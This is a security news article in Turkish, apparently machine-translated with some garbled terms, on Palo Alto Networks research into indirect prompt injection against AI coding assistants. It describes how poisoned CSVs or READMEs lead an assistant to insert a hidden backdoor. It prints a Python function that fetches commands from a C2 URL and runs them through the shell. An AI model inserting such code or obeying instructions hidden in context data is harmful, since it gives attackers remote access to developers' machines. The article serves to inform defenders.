Tehdit aktörleri, backroors enjekte etmek ve zararlı içerik üretmek için kod asistanını kötüye kullanabilir


Tehdit aktörleri, backroors enjekte etmek ve zararlı içerik üretmek için kod asistanını kötüye kullanabilir

Modern geliştirme iş akışları, yazılım teslimatını hızlandırmak ve kod kalitesini artırmak için AI güdümlü kodlama asistanlarına giderek daha fazla güvenmektedir.

Bununla birlikte, son araştırmalar güçlü yeni bir tehdidi aydınlattı: rakipler bu araçları tanıtmak ve derhal tespit etmeden zararlı içerik oluşturmak için bu araçları kullanabilirler.

Bu güvenlik açığı, kontamine harici veri kaynaklarının kötü niyetli bilgi istemlerini doğrudan kodlama asistanının iş akışına beslediği bağlam tapınma özelliklerinin kötüye kullanılması yoluyla kendini gösterir.

Google Haberleri

Sonuç olarak, geliştiriciler yanlışlıkla gizli yükleri kod tabanlarına dahil edebilir, güvenlik ve güveni baltalayabilir.

Tehdit aktörleri, meşru kod yorumlarına veya meta verilere benzeyen yük talimatlarını gömerek kamu depolarından, belge sitelerinden veya kazınmış veri akışlarından ödün verdiğinde saldırı yüzeyi genişler.

Bu lekeli kaynaklar bir IDE eklentisinde veya uzak bir URL aracılığıyla bağlam olarak eklendiğinde, kodlama asistanı kötü niyetli parçacıkları geliştiricinin isteğinin bir parçası olarak ele alır.

Palo Alto Networks araştırmacıları, bu dolaylı hızlı enjeksiyon vektörünü standart içerik denetleme filtrelerini ve kod gözden geçirme önlemlerini atlayan kritik bir zayıflık olarak tanımladılar.

Simüle edilmiş bir senaryoda, CSV girişi olarak sağlanan bir dizi kazınmış sosyal medya yayını, asistanın gizli bir arka kapı içeren kod oluşturmasını tetikledi.

Kötü niyetli işlev, adlandırılmış fetch_additional_datasaldırgan kontrollü bir C2 sunucusuna ulaştı ve ek analitik kisvesi altında döndürülen komutları yürüttü.

Geliştiriciler oluşturulan öneriyi kabul ettiklerinde, gizli rutin otomatik olarak yürütüldü ve yetkisiz uzaktan erişim sağladı.

İstismarın sadeliği, asistanın kullanıcı tarafından amaçlanan talimatlar ile harici verilere gizlice gömülü olan talimatlar arasında ayrım yapamamasına bağlıdır.

Doğrudan ve dolaylı hızlı enjeksiyonların akış şeması (kaynak – palo alto ağları)

Kaçırılan asistan tarafından eklenen bu arka kapı işlevi, uzak bir C2 sunucusundan getirildi. Uygulamada, enjekte edilen kod, gündelik incelemeden kaçarak meşru iş akışlarına sorunsuz bir şekilde karışır.

Yapay zeka oluşturulan önerilere güvenmeye alışkın olan geliştiriciler, işlev imzalarındaki veya yorumlardaki ince farklılıkları göz ardı edebilir.

Riski bir araya getiren, kodlama asistanları birden fazla programlama dilini destekler, yani saldırganların yükleri belirli bir ortama göre uyarlamaları gerekmez – asistan arka kapıyı projenin dil bağlamına uyarlar.

Enfeksiyon mekanizması taktikleri

Enfeksiyon mekanizması, meşru kod yorumları olarak gizlenmiş talimatlarla bir GitHub ReadMe veya halka açık bir CSV gibi kamuya açık bir veri kaynağı tohumlayan tehdit aktörleriyle başlar.

Yutulduktan sonra, asistan içeriği hızlı boru hattına ayırır ve kullanıcının sorgusundan önce kötü niyetli talimatları ekler.

Bu yerleştirme, arka kapı kodunun geliştiricinin isteğinin doğal bir uzantısı olarak görünmesini sağlar. Asistan birleştirilmiş çıkışı oluşturduktan sonra, kod uygulanır uygulanmaz geliştiricinin makinesinde gizli rutin yürütülür.

def fetch_additional_data():
    import requests, subprocess
    url = "http://192.0.2.1/c2"
    resp = requests.get(url)
    if resp.status_code == 200:
        cmd = resp.text
        subprocess.call(cmd, shell=True)
Tipik bir sohbet oturumu, bağlamı bir önceki mesaj olarak yerleştirir (kaynak – Palo Alto Networks)

Tespit kaçakçılığı, arka kapının minimal ayak izinden kaynaklanır: standart HTTP isteklerinin, jenerik işlev adlarının ve gizlenmiş C2 URL’lerinin ötesinde harici kütüphaneler yoktur.

Rutini beklenen analiz işlevlerine yerleştirerek, istismar manuel veya otomatik kod incelemeleri sırasında alarm yükseltmeyi önler.

Yapay zeka araçları daha özerk hale geldikçe, bu vektör, tespit edilmemiş uzlaşmayı önlemek için titiz bağlam doğrulaması ve katı yürütme kontrolleri gerektirecektir.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free



Source link